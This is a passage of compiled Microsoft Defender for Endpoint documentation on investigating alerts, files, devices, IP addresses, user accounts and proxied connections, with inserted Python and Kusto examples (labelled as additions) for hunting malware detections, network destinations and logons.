Investigate devices in the Microsoft Defender for Endpoint Devices list
Investigate an IP address associated with a Microsoft Defender for Endpoint alert
Investigate a domain associated with a Microsoft Defender for Endpoint alert
Investigate a user account in Microsoft Defender for Endpoint



Investigate alerts in Microsoft Defender for Endpoint
Article • 07/18/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Investigate alerts that are affecting your network, understand what they mean, and how
to resolve them.

Select an alert from the alerts queue to go to the alert page. This view contains the alert
title, the affected assets, the details side pane, and the alert story.

From the alert page, begin your investigation by selecting the affected assets or any of
the entities under the alert story tree view. The details pane automatically populates
with further information about what you selected. To see what kind of information you
can view here, read Review alerts in Microsoft Defender for Endpoint.

Investigate using the alert story

The alert story details why the alert was triggered, related events that happened before
and after, as well as other related entities.

Entities are clickable and every entity that isn't an alert is expandable using the expand
icon on the right side of that entity's card. The entity in focus will be indicated by a blue
stripe to the left side of that entity's card, with the alert in the title being in focus at first.

Expand entities to view details at a glance. Selecting an entity will switch the context of
the details pane to this entity, and will allow you to review further information, as well as
manage that entity. Selecting ... to the right of the entity card will reveal all actions
available for that entity. These same actions appear in the details pane when that entity
is in focus.

Note

The alert story section may contain more than one alert, with additional alerts
related to the same execution tree appearing before or after the alert you've
selected.

Take action from the details pane

Once you've selected an entity of interest, the details pane will change to display
information about the selected entity type, historic information when it's available, and
offer controls to take action on this entity directly from the alert page.

Once you're done investigating, go back to the alert you started with, mark the alert's
status as Resolved and classify it as either False alert or True alert. Classifying alerts
helps tune this capability to produce more true alerts and fewer false alerts.

If you classify it as a true alert, you can also select a determination, as shown in the
image below.

If you are experiencing a false alert with a line-of-business application, create a
suppression rule to avoid this type of alert in the future.

 Tip
If you're experiencing any issues not described above, use the 🙂 button to
provide feedback or open a support ticket.

Related topics
View and organize the Microsoft Defender for Endpoint Alerts queue
Manage Microsoft Defender for Endpoint alerts
Investigate a file associated with a Defender for Endpoint alert
Investigate devices in the Defender for Endpoint Devices list
Investigate an IP address associated with a Defender for Endpoint alert
Investigate a domain associated with a Defender for Endpoint alert
Investigate a user account in Defender for Endpoint



Microsoft Defender for Endpoint Antivirus and Intune integration
Article • 02/09/2024

Applies to:

Microsoft Defender XDR
Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Endpoint Plan 1

Want to experience Defender for Endpoint? Sign up for a free trial.

Platforms

Windows
macOS
Android

In the Microsoft Defender portal, you can view and manage threat detections using the
following steps:

1. Visit the Microsoft XDR portal and sign in.

On the landing page, you'll see the Devices with active malware card with the
following information:

Display text: Applies to Intune-managed devices. Devices with multiple
malware detections may be counted more than once.
Last updated date and time.
A bar with the Active and Malware remediated portions as per your scan.

You can select View Details for more information.

2. Once remediated, you'll see the following text being displayed:

Malware found on your devices have been remediated successfully.

Manage threat detections in Microsoft Intune

You can manage threat detections for any devices that are enrolled in Microsoft Intune
using the following steps:

1. Go to the Microsoft Intune admin center at intune.microsoft.com and sign in.

2. In the navigation pane, select Endpoint security.

3. Under Manage, select Antivirus. You'll see tabs for Summary, Unhealthy
endpoints, and Active malware.

4. Review the information on the available tabs, and then take action as necessary.

For example, when you select a device that is listed under the Active malware
tab, you can choose one action from the list of actions provided:

Restart
Quick Scan
Full Scan
Sync
Update signatures

FAQs

In the Microsoft XDR portal > Devices with active malware > Devices with malware
detections report, why does the Last update seem to be occurring today?
To see when the malware was detected, you can do the following:

1. Since this is an integration with Intune, visit Intune portal and select Antivirus
and then select Active malware tab.
2. Select Export.
3. On your device, go to Downloads, and extract the Active
malware_YYYY_MM_DD_THH_MM_SS.0123Z.csv.zip.
4. Open the CSV and find the LastStateChangeDateTime column to see when
malware was detected.

In the devices with malware detections report, why can't I see any information about
which malware was detected on the device?
To see the malware name, visit the Intune portal (this is an integration with Intune),
select Antivirus, and then select the Active malware tab; you'll see a column named
Malware name.

I see a different number for active malware in the Devices with active malware report
when compared to the numbers I see using Reports > Detected malware, and Intune >
Antivirus > Active malware.
The Devices with active malware report is based on the devices that were active within
the last 1 day (24 hours) and had malware detections within the last 15 days.

Use the following Advanced Hunting query:

Kusto

// Devices that were onboarded, had an active sensor, and reported since the start of the chosen day
DeviceInfo
| where Timestamp > startofday(datetime(2024-01-29 00:00:00))
| where OnboardingStatus == "Onboarded"
| where SensorHealthState == "Active"
| distinct DeviceId, DeviceName
// ... joined with Defender for Endpoint antivirus detections from the last 15 days
| join kind=innerunique (
    AlertEvidence
    | where Timestamp > ago(15d)
    | where ServiceSource == "Microsoft Defender for Endpoint"
    | where DetectionSource == "Antivirus"
    ) on DeviceName
| distinct DeviceName, DeviceId, Title, AlertId, Timestamp
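The same population the Advanced Hunting query above selects, recomputed offline over constructed sample rows as an added example (not Microsoft's code): it shows why the report's device count is smaller than the raw count of antivirus detections, and it joins on DeviceId rather than DeviceName so that two devices sharing a name stay distinct. The row shapes, device names, alert ids, the fixed NOW clock and the helper names are constructed assumptions.

```python
# Added example: offline check of the "Devices with active malware" population.
# All rows below are constructed sample telemetry, not real data.
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

MDE = "Microsoft Defender for Endpoint"
NOW = datetime(2024, 1, 29, 18, 0, 0)   # fixed clock for the sample


def device(dev_id, name, last_seen, health="Active", onboarding="Onboarded"):
    """Constructed DeviceInfo row (subset of columns used by the query)."""
    return {"DeviceId": dev_id, "DeviceName": name, "Timestamp": last_seen,
            "OnboardingStatus": onboarding, "SensorHealthState": health}


def evidence(alert_id, dev_id, name, when, source="Antivirus"):
    """Constructed AlertEvidence row (subset of columns used by the query)."""
    return {"AlertId": alert_id, "DeviceId": dev_id, "DeviceName": name,
            "Timestamp": when, "ServiceSource": MDE, "DetectionSource": source,
            "Title": "Constructed malware detection"}


DEVICE_INFO = [
    device("id-0001", "ws-finance-01", NOW - timedelta(hours=2)),
    device("id-0002", "ws-finance-02", NOW - timedelta(days=3)),       # inactive > 24h
    device("id-0003", "ws-hr-07", NOW - timedelta(hours=1)),
    device("id-0004", "ws-hr-07", NOW - timedelta(hours=5)),           # same name, re-imaged
    device("id-0005", "srv-build-01", NOW - timedelta(minutes=30), health="Inactive"),
]

ALERT_EVIDENCE = [
    evidence("da-1", "id-0001", "ws-finance-01", NOW - timedelta(days=2)),
    evidence("da-2", "id-0001", "ws-finance-01", NOW - timedelta(days=20)),  # older than 15d
    evidence("da-3", "id-0002", "ws-finance-02", NOW - timedelta(days=1)),   # device not active
    evidence("da-4", "id-0003", "ws-hr-07", NOW - timedelta(days=5)),
    evidence("da-5", "id-0004", "ws-hr-07", NOW - timedelta(days=1), source="EDR"),  # not AV
    evidence("da-6", "id-0005", "srv-build-01", NOW - timedelta(days=1)),    # sensor inactive
]


def active_devices(rows, now=NOW, window=timedelta(days=1)) -> Dict[str, str]:
    """Onboarded devices with an active sensor seen within the window (DeviceId -> name)."""
    return {r["DeviceId"]: r["DeviceName"] for r in rows
            if r["OnboardingStatus"] == "Onboarded"
            and r["SensorHealthState"] == "Active"
            and r["Timestamp"] > now - window}


def av_detections(rows, now=NOW, window=timedelta(days=15)) -> List[dict]:
    """Antivirus detections from Defender for Endpoint within the window."""
    return [r for r in rows if r["ServiceSource"] == MDE
            and r["DetectionSource"] == "Antivirus"
            and r["Timestamp"] > now - window]


def devices_with_active_malware(devices, alerts, now=NOW) -> Dict[str, List[str]]:
    """DeviceId -> alert ids for devices active in the last day with AV detections in 15d."""
    active = active_devices(devices, now)
    hits: Dict[str, List[str]] = defaultdict(list)
    for ev in av_detections(alerts, now):
        if ev["DeviceId"] in active:          # join on DeviceId, not DeviceName
            hits[ev["DeviceId"]].append(ev["AlertId"])
    return dict(hits)


def duplicate_device_names(devices) -> Dict[str, List[str]]:
    """Names shared by more than one DeviceId; disambiguate these by DeviceId."""
    by_name: Dict[str, set] = defaultdict(set)
    for r in devices:
        by_name[r["DeviceName"]].add(r["DeviceId"])
    return {n: sorted(ids) for n, ids in by_name.items() if len(ids) > 1}


if __name__ == "__main__":
    print("report devices:", devices_with_active_malware(DEVICE_INFO, ALERT_EVIDENCE))
    print("AV detections in 15d:", len(av_detections(ALERT_EVIDENCE)))   # 4, but only 2 devices
    print("duplicate names:", duplicate_device_names(DEVICE_INFO))
```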

I searched the computer name in the top search bar and got two devices with the same
name. I don't know which one of those two devices the report is referring to?
Use the Advanced Hunting query that is mentioned here for details such as unique
DeviceID, Title, AlertID, and the remediation process. After identifying, work with your IT
admins to make sure that the devices are uniquely named. If a device is retired, use tags
to decommission it.

I see malware detection in Intune and on the Devices with active malware report, but I
don't see it in the MDE Alerts queue or in the Incidents queue.
It might be that the Cloud Protection URLs are currently not being allowed through your
firewall or proxy. Ensure that when you run
%ProgramFiles%\Windows Defender\MpCmdRun.exe -ValidateMapsConnection
on your device, the reporting is Ok.

Related articles
Alerts in Microsoft Defender for Endpoint
Alerts queue in Microsoft Defender XDR



Investigate a file
Article • 07/18/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Investigate the details of a file associated with a specific alert, behavior, or event to help
determine if the file exhibits malicious activities, identify the attack motivation, and
understand the potential scope of the breach.

There are many ways to access the detailed profile page of a specific file. For example,
you can use the search feature, click on a link from the Alert process tree, Incident
graph, Artifact timeline, or select an event listed in the Device timeline.

Once on the detailed profile page, you can switch between the new and old page
layouts by toggling new File page. The rest of this article describes the newer page
layout.

You can get information from the following sections in the file view:

File details and PE metadata (if it exists)
Incidents and alerts
Observed in organization
File names
File content and capabilities (if a file has been analyzed by Microsoft)

You can also take action on a file from this page.

File actions
The file actions are above the file information cards at the top of the profile page.
Actions you can perform here include:

Stop and quarantine
Manage indicator
Download file
Ask Defender Experts
Manual actions
Go hunt
Deep analysis

See take response action on a file for more information on these actions.

File page overview

The file page offers an overview of the file's details and attributes, the incidents and
alerts where the file is seen, file names used, the number of devices where the file was
seen in the last 30 days, including the dates when the file was first and last seen in the
organization, Virus Total detection ratio, Microsoft Defender Antivirus detection, the
number of cloud apps connected to the file, and the file's prevalence in devices outside
of the organization.

Note

Different users may see dissimilar values in the devices in organization section of
the file prevalence card. This is because the card displays information based on the
role-based access control (RBAC) scope that a user has. This means if a user has
been granted visibility on a specific set of devices, they will only see the file
organizational prevalence on those devices.

Incidents and alerts

The Incidents and alerts tab provides a list of incidents that are associated with the file
and the alerts the file is linked to. This list covers much of the same information as the
incidents queue. You can choose what kind of information is shown by selecting
Customize columns. You can also filter the list by selecting Filter.

Observed in organization
The Observed in organization tab shows you the devices and cloud apps observed with
the file. File history related to devices can be shown up to the last six months, whereas
cloud apps-related history is up to the last 30 days.

Devices
This section shows all the devices where the file is detected. The section includes a
trending report identifying the number of devices where the file has been observed in
the past 30 days. Below the trendline, you can find detailed information on the file on
each device where it is seen, including file execution status, first and last seen events on
each device, initiating process and time, and file names associated with a device.

You can click on a device on the list to explore the full six months file history on each
device and pivot to the first seen event in the device timeline.

Cloud apps

Note

The Defender for Cloud Apps workload must be enabled to see file information
related to cloud apps.

This section shows all the cloud applications where the file is observed. It also includes
information like the file's names, the users associated with the app, the number of
matches to a specific cloud app policy, associated apps' names, when the file was last
modified, and the file's path.

File names
The File names tab lists all names the file has been observed to use within your
organization.

File content and capabilities

Note

The file content and capabilities views depend on whether Microsoft analyzed the
file.

The File content tab lists information about portable executable (PE) files, including
process writes, process creation, network activities, file writes, file deletes, registry reads,
registry writes, strings, imports, and exports. This tab also lists all the file's capabilities.

The file capabilities view lists a file's activities as mapped to the MITRE ATT&CK™
techniques.

Related topics
View and organize the Microsoft Defender for Endpoint queue
Manage Microsoft Defender for Endpoint alerts
Investigate Microsoft Defender for Endpoint alerts
Investigate devices in the Microsoft Defender for Endpoint Devices list
Investigate an IP address associated with a Microsoft Defender for Endpoint alert
Investigate a domain associated with a Microsoft Defender for Endpoint alert
Investigate a user account in Microsoft Defender for Endpoint
Take response actions on a file



Investigate devices in the Microsoft Defender for Endpoint Devices list
Article • 02/21/2024

Applies to:

Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Investigate the details of an alert raised on a specific device to identify other behaviors
or events that might be related to the alert or the potential scope of the breach.

Note

As part of the investigation or response process, you can collect an investigation
package from a device. Here's how: Collect investigation package from devices.

You can select on affected devices whenever you see them in the portal to open a
detailed report about that device. Affected devices are identified in the following areas:

Devices list
Alerts queue
Any individual alert
Any individual file details view
Any IP address or domain details view

When you investigate a specific device, you see:

Device details
Response actions
Tabs (overview, alerts, timeline, security recommendations, software inventory,
discovered vulnerabilities, missing KBs)
Cards (active alerts, logged on users, security assessment, device health status)

Note

Due to product constraints, the device profile does not consider all cyber evidence
when determining the 'Last Seen' timeframe (as seen on the device page as well).
For example, the 'Last seen' value in the Device page may show an older time frame
even though more recent alerts or data is available in the machine's timeline.

Device details
The device details section provides information such as the domain, OS, and health state
of the device. If there's an investigation package available on the device, you see a link
that allows you to download the package.

Response actions
Response actions run along the top of a specific device page and include:

Manage tags
Isolate device
Restrict app execution
Run antivirus scan
Collect investigation package
Initiate Live Response Session
Initiate automated investigation
Consult a threat expert
Action center

You can take response actions in the Action center, in a specific device page, or in a
specific file page.

For more information on how to take action on a device, see Take response action on a
device.

For more information, see Investigate user entities.

Tabs
The tabs provide relevant security and threat prevention information related to the
device. In each tab, you can customize the columns that are shown by selecting
Customize columns from the bar above the column headers.

Overview
The Overview tab displays the cards for active alerts, logged on users, and security
assessment.

Incidents and alerts

The Incidents and alerts tab provides a list of incidents and alerts that are associated
with the device. This list is a filtered version of the Alerts queue, and shows a short
description of the incident, alert, severity (high, medium, low, informational), status in
the queue (new, in progress, resolved), classification (not set, false alert, true alert),
investigation state, category of alert, who is addressing the alert, and last activity. You
can also filter the alerts.

When an alert is selected, a fly-out appears. From this panel you can manage the alert
and view more details such as incident number and related devices. Multiple alerts can
be selected at a time.

To see a full page view of an alert, select the title of the alert.

Timeline
The Timeline tab provides a chronological view of the events and associated alerts that
have been observed on the device. This can help you correlate any events, files, and IP
addresses in relation to the device.

The timeline also enables you to selectively drill down into events that occurred within a
given time period. You can view the temporal sequence of events that occurred on a
device over a selected time period. To further control your view, you can filter by event
groups or customize the columns.

Note

For firewall events to be displayed, you'll need to enable the audit policy, see Audit
Filtering Platform connection.

Firewall covers the following events:

5025 - firewall service stopped
5031 - application blocked from accepting incoming connections on the
network
5157 - blocked connection

Some of the functionality includes:

Search for specific events
Use the search bar to look for specific timeline events.

Filter events from a specific date
Select the calendar icon in the upper left of the table to display events in the
past day, week, 30 days, or custom range. By default, the device timeline is set
to display the events from the past 30 days.
Use the timeline to jump to a specific moment in time by highlighting the
section. The arrows on the timeline pinpoint automated investigations.

Export detailed device timeline events
Export the device timeline for the current date or a specified date range up to
seven days.

More details about certain events are provided in the Additional information section.
These details vary depending on the type of event, for example:

Contained by Application Guard - the web browser event was restricted by an
isolated container
Active threat detected - the threat detection occurred while the threat was running
Remediation unsuccessful - an attempt to remediate the detected threat was
invoked but failed
Remediation successful - the detected threat was stopped and cleaned
Warning bypassed by user - the Windows Defender SmartScreen warning was
dismissed and overridden by a user
Suspicious script detected - a potentially malicious script was found running
The alert category - if the event led to the generation of an alert, the alert category
(Lateral Movement, for example) is provided

Event details
Select an event to view relevant details about that event. A panel displays to show
general event information. When applicable and data is available, a graph showing
related entities and their relationships are also shown.

To further inspect the event and related events, you can quickly run an advanced
hunting query by selecting Hunt for related events. The query returns the selected
event and the list of other events that occurred around the same time on the same
endpoint.

Security recommendations
Security recommendations are generated from Microsoft Defender for Endpoint's
Vulnerability Management capability. Selecting a recommendation shows a panel where
you can view relevant details such as description of the recommendation and the
potential risks associated with not enacting it. See Security recommendation for details.

Security policies
The Security policies tab shows the endpoint security policies that are applied on the
device. You see a list of policies, type, status, and last check-in time. Selecting the name
of a policy takes you to the policy details page where you can see the policy settings
status, applied devices, and assigned groups.

Software inventory
The Software inventory tab lets you view software on the device, along with any
weaknesses or threats. Selecting the name of the software takes you to the software
details page where you can view security recommendations, discovered vulnerabilities,
installed devices, and version distribution. See Software inventory for details.

Discovered vulnerabilities
The Discovered vulnerabilities tab shows the name, severity, and threat insights of
discovered vulnerabilities on the device. If you select a specific vulnerability, you see a
description and details.

Missing KBs
The Missing KBs tab lists the missing security updates for the device.

Cards

Active alerts
The Azure Advanced Threat Protection card displays a high-level overview of alerts
related to the device and their risk level, if you're using the Microsoft Defender for
Identity feature, and there are any active alerts. More information is available in the
Alerts drill down.

Note

You'll need to enable the integration on both Microsoft Defender for Identity and
Defender for Endpoint to use this feature. In Defender for Endpoint, you can enable
this feature in advanced features. For more information on how to enable advanced
features, see Turn on advanced features.

Logged on users
The Logged on users card shows how many users have logged on in the past 30 days,
along with the most and least frequent users. Selecting the See all users link opens the
details pane, which displays information such as user type, sign-in type, and when the
user was first and last seen. For more information, see Investigate user entities.

Note

The 'Most frequent' user value is calculated only based on evidence of users who
successfully logged on interactively. However, the All users side-pane calculates all
sorts of user logons so it is expected to see more frequent users in the side-pane,
given that those users may not be interactive.

Security assessments
The Security assessments card shows the overall exposure level, security
recommendations, installed software, and discovered vulnerabilities. A device's exposure
level is determined by the cumulative impact of its pending security recommendations.

Device health status

The Device health status card shows a summarized health report for the specific device.
One of the following messages is displayed at the top of the card to indicate the overall
status of the device (listed in order of highest to lowest priority):

Defender Antivirus not active
Security intelligence isn't up to date
Engine isn't up to date
Quick scan failed
Full scan failed
Platform isn't up to date
Security intelligence update status is unknown
Engine update status is unknown
Quick scan status is unknown
Full scan status is unknown
Platform update status is unknown
Device is up to date
Status not available for macOS & Linux

Other information in the card includes: the last full scan, last quick scan, security
intelligence update version, engine update version, platform update version, and
Defender Antivirus mode.

Note that a grey circle indicates that the data is unknown.

Note

The overall status message for macOS and Linux devices currently shows up as
'Status not available for macOS & Linux'. Currently, the status summary is only
available for Windows devices. All other information in the table is up to date to
show the individual states of each device health signal for all supported platforms.

To gain an in-depth view of the device health report, you can go to Reports > Devices
health. For more information, see Device health and compliance report in Microsoft
Defender for Endpoint.

Note

The date and time for Defender Antivirus mode is currently not available.

Related articles
View and organize the Microsoft Defender for Endpoint Alerts queue
Manage Microsoft Defender for Endpoint alerts
Investigate Microsoft Defender for Endpoint alerts
Investigate a file associated with a Defender for Endpoint alert
Investigate an IP address associated with a Defender for Endpoint alert
Investigate a domain associated with a Defender for Endpoint alert
Investigate a user account in Defender for Endpoint
Security recommendation
Software inventory



Investigate an IP address associated with a Microsoft Defender for Endpoint alert
Article • 11/17/2022

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Examine possible communication between your devices and external internet protocol
(IP) addresses.

Identifying all devices in the organization that communicated with a suspected or
known malicious IP address, such as Command and Control (C2) servers, helps
determine the potential scope of breach, associated files, and infected devices.

You can find information from the following sections in the IP address view:

IP geo information
Alerts related to this IP
IP in organization observations
Prevalence in organization

IP geo information
In the left pane, the page provides IP details (if available).

Organization (ISP)
ASN
Country
State
City
Carrier
Latitude
Longitude
Postal code

Alerts related to this IP
The Alerts related to this IP section provides a list of alerts that are associated with the
IP.

IP observed in organization
The IP observed in organization section provides a list of devices that have a
connection with this IP and the last event details for each device (the list is limited to
100 devices).

Prevalence
The Prevalence section displays how many devices have connected to this IP address,
and when the IP was first and last seen. You can filter the results of this section by time
period; the default period is 30 days.

Investigate an external IP:

1. Enter the IP address in the Search field.
2. Select the IP suggestion box and open the IP side panel.
3. Select Enter.

Details about the IP address are displayed, including: registration details (if available),
prevalence of devices in the organization that communicated with this IP Address
(during selectable time period), and the devices in the organization that were observed
communicating with this IP address.

Note

Search results will only be returned for IP addresses observed in communication
with devices in the organization.

Use the search filters to define the search criteria. You can also use the timeline search
box to filter the displayed results of all devices in the organization observed
communicating with the IP address, the file associated with the communication and the
last date observed.

Clicking any of the device names will take you to that device's view, where you can
continue to investigate reported alerts, behaviors, and events.
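
The questions the IP address view answers (which devices talked to the address, how often, when it was first and last seen, and which process made the connection) can also be asked in advanced hunting. The following Kusto query is an added example and is not part of the original article; the IP address is a placeholder from the RFC 5737 documentation range that you replace with the address under investigation.

```kusto
// Added example (not from the article): per-device view of one external IP,
// the data behind the "IP observed in organization" and "Prevalence" sections.
let SuspectIP = "203.0.113.10";   // placeholder from the RFC 5737 documentation range; replace it
let LookBack = 30d;               // same default window as the Prevalence section
DeviceNetworkEvents
| where Timestamp > ago(LookBack)
| where RemoteIP == SuspectIP     // no ActionType filter: failed and inbound attempts count too
| summarize FirstSeen   = min(Timestamp),
            LastSeen    = max(Timestamp),
            Connections = count(),
            ActionTypes = make_set(ActionType),
            RemotePorts = make_set(RemotePort, 10),
            Processes   = make_set(InitiatingProcessFileName, 10),
            Accounts    = make_set(InitiatingProcessAccountName, 10)
          by DeviceId, DeviceName
| order by LastSeen desc
| take 100                        // the portal's device list is capped at 100 entries as well
```

Each row is one device, so the number of rows is the prevalence for the period. To get the device count without the 100-row cap, replace the summarize with `summarize Devices = dcount(DeviceId), FirstSeen = min(Timestamp), LastSeen = max(Timestamp)` and drop the `take`.
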

Related topics
View and organize the Microsoft Defender for Endpoint Alerts queue
Manage Microsoft Defender for Endpoint alerts
Investigate Microsoft Defender for Endpoint alerts
Investigate a file associated with a Microsoft Defender for Endpoint alert
Investigate devices in the Microsoft Defender for Endpoint Devices list
Investigate a domain associated with a Microsoft Defender for Endpoint alert
Investigate a user account in Microsoft Defender for Endpoint

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .



Investigate connection events that occur
behind forward proxies
Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Defender for Endpoint supports network connection monitoring from different levels of
the network stack. A challenging case is when the network uses a forward proxy as a
gateway to the Internet.

The proxy acts as if it were the target endpoint. In these cases, simple network
connection monitors record the connections to the proxy, which is correct but has
lower investigation value.

Defender for Endpoint supports advanced HTTP level monitoring through network
protection. When turned on, a new type of event is surfaced which exposes the real
target domain names.

Use network protection to monitor network connection behind a firewall
Monitoring network connection behind a forward proxy is possible due to other
network events that originate from network protection. To see them on a device
timeline, turn on network protection (at the minimum in audit mode).

Network protection can be controlled using the following modes:

Block: Users or apps are blocked from connecting to dangerous domains. You'll be
able to see this activity in Microsoft Defender XDR.
Audit: Users or apps won't be blocked from connecting to dangerous domains.
However, you'll still see this activity in Microsoft Defender XDR.

If you turn off network protection, users or apps won't be blocked from connecting to
dangerous domains. You won't see any network activity in Microsoft Defender XDR.
If you don't configure it, network blocking is turned off by default.

For more information, see Enable network protection.

Investigation impact
When network protection is turned on, you'll see that on a device's timeline the IP
address keeps representing the proxy, while the real target address shows up.

Other events triggered by the network protection layer are now available to surface the
real domain names even behind a proxy.

Event's information:

Hunt for connection events using advanced hunting
All new connection events are available for you to hunt on through advanced hunting as
well. Since these events are connection events, you can find them under the
DeviceNetworkEvents table under the ConnectionSuccess action type.

Using this simple query shows you all the relevant events:

Console

DeviceNetworkEvents
| where ActionType == "ConnectionSuccess"
| take 10

You can also filter out events that are related to connection to the proxy itself.

Use the following query to filter out the connections to the proxy:

Console

DeviceNetworkEvents
| where ActionType == "ConnectionSuccess" and RemoteIP != "ProxyIP"
| take 10
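
Excluding the proxy address, as the query above does, also drops the network protection events whose RemoteIP is the proxy but whose RemoteUrl carries the real destination, which is exactly the investigation value this article describes. The following Kusto query is an added example, not part of the original article; it keeps those events and groups them by the real target host. ProxyIP is a placeholder you replace with your forward proxy's address.

```kusto
// Added example (not from the article): real destinations reached through a forward
// proxy, taken from the RemoteUrl that network protection fills in while RemoteIP
// still shows the proxy.
let ProxyIP = "10.0.0.5";        // placeholder; replace with your forward proxy's address
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where ActionType == "ConnectionSuccess"
| where RemoteIP == ProxyIP and isnotempty(RemoteUrl)
// RemoteUrl may be a full URL or a bare host name; normalise both to a host
| extend TargetHost = tostring(parse_url(RemoteUrl).Host)
| extend TargetHost = iif(isempty(TargetHost), RemoteUrl, TargetHost)
| summarize Devices     = dcount(DeviceId),
            Connections = count(),
            FirstSeen   = min(Timestamp),
            LastSeen    = max(Timestamp),
            Processes   = make_set(InitiatingProcessFileName, 10)
          by TargetHost
// rarely contacted hosts first: a destination seen from a single device is the
// usual starting point when triaging proxied traffic
| order by Devices asc, Connections asc
```

Rows with an empty RemoteUrl are plain connections to the proxy and are left out; they are the ones the article's second query filters away.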

Related articles
Applying network protection with GP - policy CSP

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .


Investigate a user account in Microsoft
Defender for Endpoint
Article • 03/29/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Investigate user account entities
Identify user accounts with the most active alerts (displayed on dashboard as "Users at
risk") and investigate cases of potential compromised credentials, or pivot on the
associated user account when investigating an alert or device to identify possible lateral
movement between devices with that user account.

You can find user account information in the following views:

Dashboard
Alert queue
Device details page

A clickable user account link is available in these views, which takes you to the user
account details page where more details about the user account are shown.

When you investigate a user account entity, you can see:

User account details, Microsoft Defender for Identity alerts, and logged on devices,
role, logon type, and other details
Overview of the incidents and user's devices
Alerts related to this user
Observed in organization (devices logged on to)

User details
The User details pane on the left provides information about the user, such as related open
incidents, active alerts, SAM name, SID, Microsoft Defender for Identity alerts, number of
devices the user is logged on to, when the user was first and last seen, role, and logon
types. Depending on the integration features you've enabled, you can see other details.
For example, if you enable the Skype for business integration, you're able to contact the
user from the portal. The Azure ATP alerts section contains a link that takes you to the
Microsoft Defender for Identity page, if you've enabled the Microsoft Defender for
Identity feature, and there are alerts related to the user. The Microsoft Defender for
Identity page provides more information about the alerts.

7 Note

You'll need to enable the integration on both Microsoft Defender for Identity and
Defender for Endpoint to use this feature. In Defender for Endpoint, you can enable
this feature in advanced features. For more information on how to enable advanced
features, see Turn on advanced features.

The Overview, Alerts, and Observed in organization are different tabs that display
various attributes about the user account.

7 Note

For Linux devices, information about logged in users is not displayed.

Overview
The Overview tab shows the incidents details and a list of the devices that the user has
logged on to. You can expand these to see details of the log-on events for each device.

Alerts
The Alerts tab provides a list of alerts that are associated with the user account. This list
is a filtered view of the Alert queue, and shows alerts where the user context is the
selected user account, the date when the last activity was detected, a short description
of the alert, the device associated with the alert, the alert's severity, the alert's status in
the queue, and who is assigned the alert.

Observed in organization
The Observed in organization tab allows you to specify a date range to see a list of
devices where this user was observed logged on to, the most frequent and least
frequent logged on user account for each of these devices, and total observed users on
each device.

Selecting an item on the Observed in organization table expands the item, revealing
more details about the device. Directly selecting a link within an item sends you to the
corresponding page.
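
The same "where was this account seen logging on, and from where" view can be built in advanced hunting over the DeviceLogonEvents table, which is useful when you want to pivot from a device list to lateral movement checks. This Kusto query is an added example and is not part of the original article; the account name is a placeholder you replace with the SAM account name under investigation.

```kusto
// Added example (not from the article): devices a user account logged on to in the
// lookback window, the logon types used, and the remote sources of network logons.
let Account = "jdoe";            // placeholder SAM account name; replace it
let LookBack = 30d;              // matches the 30-day default of the search results
DeviceLogonEvents
| where Timestamp > ago(LookBack)
| where ActionType == "LogonSuccess"
| where AccountName =~ Account   // case-insensitive match on the account name
// remote logons record where they came from; prefer the device name, fall back to the IP
| extend Source = iif(isnotempty(RemoteDeviceName), RemoteDeviceName, RemoteIP)
| summarize Logons        = count(),
            FirstSeen     = min(Timestamp),
            LastSeen      = max(Timestamp),
            LogonTypes    = make_set(LogonType),
            RemoteSources = make_set_if(Source, isnotempty(Source), 10),
            AdminLogons   = countif(IsLocalAdmin)   // logons where the account was local admin
          by DeviceName, AccountDomain
| order by LastSeen desc
```

A device whose RemoteSources lists another workstation, with LogonTypes containing Network or RemoteInteractive, is the pattern to examine first when the account is suspected of moving laterally.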

Search for specific user accounts
1. Select User from the Search bar drop-down menu.
2. Enter the user account in the Search field.
3. Click the search icon or press Enter.

A list of users matching the query text is displayed. You can see the user account's
domain and name, when the user account was last seen, and the total number of
devices it was observed logged on to in the last 30 days.

You can filter the results by the following time periods:

1 day
3 days
7 days
30 days
6 months

Related articles
View and organize the Microsoft Defender for Endpoint Alerts queue
Manage Microsoft Defender for Endpoint alerts
Investigate Microsoft Defender for Endpoint alerts
Investigate a file associated with a Defender for Endpoint alert
Investigate devices in the Defender for Endpoint Devices list
Investigate an IP address associated with a Defender for Endpoint alert
Investigate a domain associated with a Defender for Endpoint alert

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .



Take response actions on a device
Article • 12/15/2023

Applies to:

Microsoft Defender for Endpoint Plans 1 and 2
Microsoft Defender for Business

) Important

Some information in this article relates to prereleased product which may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Quickly respond to detected attacks by isolating devices or collecting an investigation
package. After taking action on devices, you can check activity details on the Action
center.

Response actions run along the top of a specific device page and include:

Manage tags
Initiate Automated Investigation
Initiate Live Response Session
Collect investigation package
Run antivirus scan
Restrict app execution
Isolate device
Contain device
Consult a threat expert
Action center

) Important

Defender for Endpoint Plan 1 includes only the following manual response actions:

Run antivirus scan
Isolate device
Stop and quarantine a file
Add an indicator to block or allow a file

Microsoft Defender for Business does not include the "Stop and quarantine a file"
action at this time.

Your subscription must include Defender for Endpoint Plan 2 to have all of the
response actions described in this article.

You can find device pages from any of the following views:

Alerts queue - Select the device name beside the device icon from the alerts
